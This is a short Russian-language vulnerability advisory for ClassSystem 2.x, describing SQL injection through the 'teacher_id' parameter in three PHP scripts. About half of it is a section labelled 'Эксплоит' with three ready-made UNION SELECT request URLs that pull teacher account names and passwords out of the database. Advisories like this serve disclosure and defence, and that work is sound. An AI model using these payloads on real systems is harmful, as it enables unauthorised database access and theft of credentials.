Программа: ClassSystem 2.x
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре "teacher_id" сценариями HomepageTop.php,
HomepageMain.php и MessageReply.php. Удаленный пользователь может с помощью
специально сформированного запроса выполнить произвольные SQL команды в базе
данных приложения.
Эксплоит:
http://localhost/class/HomepageTop.php?teacher_id=-99'+union+
select+0,1,teacher_password,teacher_account,4,5+from+teacher/*
http://localhost/class/HomepageMain.php?teacher_id=-99'+union+
select+0,teacher_account,2,3,4,5,6,7,teacher_password+from+teacher/*
http://localhost/class/MessageReply.php?teacher_id=1&message_id=-
99'+union+select+teacher_account,teacher_password,3,4+from+teacher/*
